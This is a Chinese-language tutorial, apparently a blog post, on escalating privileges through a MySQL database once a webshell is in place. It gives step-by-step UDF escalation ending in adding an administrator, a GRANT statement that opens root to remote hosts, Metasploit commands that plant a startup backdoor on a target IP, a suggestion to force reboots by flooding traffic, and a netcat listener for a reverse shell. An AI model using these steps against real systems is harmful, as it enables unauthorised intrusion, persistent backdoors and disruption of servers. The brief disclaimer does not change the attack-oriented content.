权限提升:Mysql 数据库.
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
目录:
提权思想:
Mysql 数据库提权:
UDF 提权:
第一步:服务探针.(端口)
第二步:信息收集.
第三步:提权利用.
启动项提权:
第一步:开启外连.
第二步:使用 msf 对 数据库 进行提权.
第三步:目标主机重启,则就会启用后门.(怎么重启目标主机,可以使用流量攻击.)
反弹提权:
第一步:在攻击机进行监听
第二步:上传 Mysql 提权工具,以后进行访问.
第三步:创建反弹函数.
第四步:执行监听.
第五步:返回 kali 查看已经返回成功.
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
提权思想:
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能.
流程:服务探针-信息收集-提权利用-获取权限
Mysql 数据库提权:
提权是我们已经有木马或其他的方法连接到web网站的目录了.
数据库的默认端口信息:
1、MySql数据库 ,默认端口是: 3306;
2、Oracle数据库 ,默认端口号为:1521;
3、Sql Server数据库 ,默认端口号为:1433;
4、DB2数据库, 默认端口号为:5000;
5、PostgreSQL数据库, 默认端口号为:5432;
6、国产的DM达梦数据库, 默认端口号为:5236;
7、Redis数据库,默认端口号:6379;
8、Memcached数据库,默认端口号:11211;
9、MongoDB数据库,默认端口号:27017;
UDF 提权:
第一步:服务探针.(端口)
第二步:信息收集.
(1)读取网站数据库配置文件(了解其命名规则及查找技巧)
查看数据库配置文件的关键字:
sql,data,inc,config,conn,database,common,include.....
(2)读取数据库存储或备份文件(了解其数据库存储格式及对应内容)
第三步:提权利用.
提权的第一步要知道数据库的版本号:
(1)mysql<5.1 导出目录 c:/windows 或 system32
(2)mysql=>5.1 导出安装目录/lib/plugin/
(1)查看数据库的安装目录
select @@basedir;
(2)复制安装目录,进行访问点击 lib 文件.
(3)点击创建 plugin 目录.(因为 mysql=>5.1 所以要创建这个目录.)
(4)复制 plugin 目录的 URL.
(5)然后点安装DLL,然后再点击自己要执行的命令.
(6)提高权限,添加管理员.(这里因为我添加了二次,所以返回的结果已存在.)
启动项提权:
导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行!
第一步:开启外连.
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
第二步:使用 msf 对 数据库 进行提权.
msfconsole
use exploit/windows/mysql/mysql_start_up //使用外连模块.
show options //查看需要配置的模块
set rhosts 192.168.0.102 //设置目标主机 IP 地址.
set username root //设置数据库用户名.
set password root //设置数据库的密码.
run //执行模块上传.
第三步:目标主机重启,则就会启用后门.(怎么重启目标主机,可以使用流量攻击.)
反弹提权:
第一步:在攻击机进行监听
nc -l -p 5577
第二步:上传 Mysql 提权工具,以后进行访问.
第三步:创建反弹函数.
第四步:执行监听.
第五步:返回 kali 查看已经返回成功.
解决安装DLL:https://www.cnblogs.com/awrrays/p/11371522.html